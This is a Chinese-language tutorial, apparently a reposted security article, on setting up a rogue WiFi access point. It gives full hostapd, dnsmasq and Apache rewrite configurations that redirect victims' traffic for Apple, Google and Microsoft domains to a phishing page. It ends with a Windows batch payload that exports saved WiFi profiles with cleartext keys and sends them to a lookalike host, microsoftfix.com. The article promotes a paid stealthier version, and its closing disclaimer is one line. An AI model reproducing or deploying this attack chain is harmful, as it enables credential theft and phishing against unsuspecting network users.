從零開始搭建一個偽造 WiFi
使用的工具:
· hostapd(或airbase-ng)
· dnsmasq(或isc-dhcp-server)
· Apache2
· Nano或Vim
· grep
簡介
Hostapd
要創建一個特定類型的接入點,無論是開放,WPA2個人,企業或業力攻擊。
dnsmasq
輕量級DNS / DHCP伺服器。它用於從機器中解析dns請求,還可以作為DHCP伺服器為客戶端分配IP地址。
Apache
作為客戶端(受害者)的Web伺服器。
可能使用apache的靈活性和特性的高級技術
注意:所有命令都以root身份執行。使用sudo,如果你是非root用戶(標準用戶)
安裝:
確保安裝了最新版本的工具:
apt update
apt install hostapd dnsmasq apache2
現在創建一個保存所有配置文件的目錄
cd ~/Desktop
mkdir fakeap/
配置hostapd:
為保存的配置文件創建一個目錄。打開終端並創建hostapd配置文件。
nano hostapd.conf
interface=
driver=nl80211
ssid=
hw_mode=g
channel=
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
配置dnsmasq:
interface= # wlan0 with hostapd, at0 with airbase-ng
dhcp-range=10.0.0.10,10.0.0.250,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
參數解釋:
dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP address will range from 10.0.0.10 to 10.0.0.250, Network subnet mask is 255.255.255.0 And default lease time is 12 hours.
dhcp-option=3,10.0.0.1: 3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1
dhcp-option=6,10.0.0.1: 6 for DNS Server followed by IP address
第1步:啟動偽AP
首先,殺死可能已經運行的麻煩的進程。
killall network-manager dnsmasq wpa_supplicant dhcpd
啟動hostapd
hostapd /path/to/configuration/file.conf
第2步:啟動dhcp伺服器
在調試模式下,使用配置文件運行dnsmasq
語法:
dnsmasq -C /path/to/configuration/file.conf -d
dnsmasq - C dnsmasq .conf - d
可選配置
您可以為dnsmasq創建一個可選的fakehosts.conf文件,以便將目標網站流量重定向到所需的IP地址。它只會告訴客戶target-site.com託管在我們的目標IP地址上。
vi fakehosts .conf
10.0.0.1 apple.com
10.0.0.1 google.com
10.0.0.1 android.clients.google.com
10.0.0.1 microsoft.com
10.0.0.1 android.com
10.0.0.1 apple.com
10.0.0.1 google.com
10.0.0.1 android.clients.google.com
10.0.0.1 microsoft.com
10.0.0.1 android.com
就這樣。只需將帶-H標誌的文件傳遞給dnsmasq,並且這些站點的所有流量將會如果您希望攻擊者針對某個網站或特定客戶端,還可以包含fakehosts.conf以通過-H標誌傳遞dns欺騙
dnsmasq - C dnsmasq .conf - H fakehosts .conf - d
第3步:配置apache2 webserver
Apache的Rewrite Engine允許我們隨時操作Web請求。使用這種技術,我們可以與我們的受害者一起做一些東西。無論是Android,iOS設備,Windows計算機還是Mac。您可以設計您的apache網路伺服器專門針對目標進行攻擊,甚至可以定位到特定的操作系統版本。
酷,對吧?
為iOS 9.x客戶端提供不同的攻擊媒介,並針對iOS 10客戶端進行不同的攻擊 它只是工作!
在這裡,我們的目標是Windows機器,因為它擁有最廣泛的安裝基礎。所以,一個非常普遍的目標Windows是一個黑客。
編輯apache默認配置文件以配置重寫功能。這將幾乎任何包含子目錄的URL重定向到我們的假AP頁面。
打開apache的默認配置文件
nano /etc/apache2/sites-enabled/000-default
並在->添加到標籤之間的文件中輸入行 。
請注意,我們正在添加一個名為/Fixit的目錄作為例外。這是區分大小寫的
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
--> add RewriteEngine On
--> add RewriteCond % !^/Fixit
--> add RewriteRule ^.*$ /Fixit/
使用您的社會工程技能,並製作網頁來吸引用戶下載並執行您的payload。您需要將index.html文件放在/var/www/html/Fixit/
啟用mod_rewrite模塊
a2enmod rewrite
您必須重新啟動apache2才能更新配置。
service apache2 restart
第4步:向apache發出DNS請求
運行dnsspoof將簡單地將所有HTTP(非HTTPS)請求重定向到我們的apache伺服器,並且不會讓受害者訪問Internet(如果禁用IP轉發)。
如果您在互聯網訪問的同時攻擊目標域名,這可能不會有用。在這種情況下,請使用帶dnsmasq的fakehosts.conf文件
但是現在我們沒有提供互聯網接入受害者,而是全部都是pwn em。所以運行:
dnsspoof - i wlan0
第5步:釣魚攻擊
@echo off
SET mypath=%~dp0
netsh wlan export profile > nul
netsh wlan export profile key=clear > nul
setlocal enableextensions enabledelayedexpansion
set /a counter=0
set filecontent=
for %%b in (*.xml) do (
set /a counter=!counter! + 1
:: echo %%b
for /f "delims=" %%a in ( type "%mypath%%%b" ) do (
set filecontent=!filecontent!%%a
)
)
echo !filecontent! > %filename%data.txt
@rem The next line is platform specific. Sometimes in a diff folder
"c:Program FilesInternet Exploreriexplore.exe" microsoftfix.com/"!filecontent!"
結語
這個攻擊比較粗糙,一點也不隱蔽,更隱蔽的方法在https://gumroad.com/l/nGMWf
本文僅做技術探討,大家測試時需告知被測試者,請勿用於違法行為。
點擊展開全文
※追溯抓雞黑客的奇妙之旅
※十種流行進程注入技術詳細分析
※兩分鐘了解網路犯罪服務平台那些不為人知的服務
※豪送XPwn 2017門票,限時領取
※安全預警:VMware虛擬機逃逸利用工具已在網上大規模流傳,用戶請儘快更新
TAG:嘶吼RoarTalk |
※用Python從零開始創建區塊鏈
※如何用 Python從0 開始創建一個區塊鏈?
※arduino從零開始(一)開始準備
※廉價版 iPhone X 或許才是蘋果下一個十年的開始
※Gigaphoton--半導體製造設備解析專用下一代開放平台「FABSCAPE?」將於3月開始提供
※iPhoneX,全新的開始,不一樣的開始
※如何從零開始用Keras開發一個機器翻譯系統!
※如何在 Keras 中從零開始開發一個神經機器翻譯系統?
※蘋果重新設計了 iBooks,而且從新版 iOS 開始將改名成 Books
※從今天開始,連「樹莓派」都有5GHz Wi-Fi了
※從零開始搭建tensorflow人工智慧開發環境
※CéLINE與Hedi Slimane的結合,一定會讓YSL開始想念他
※微軟開始修復WIN10 Mobile用戶在Edge上無法打開PDF文件的錯誤
※IKEA創始人辭世,5歲開始賣火柴從此賣出了整個IKEA帝國#fashion趨勢
※Pepper:「對每個人來說,都是重新開始」
※蘋果要出新款iPhone?產業鏈個股已經開始反彈
※LOL:8.4版本,gank最好從五分鐘後開始!
※512GB的MicroSD卡將在下個月開始鋪貨
※MONDAY NEWS︱Supreme也開始「吃雞」了?
※小米也開始模仿iPhone X了?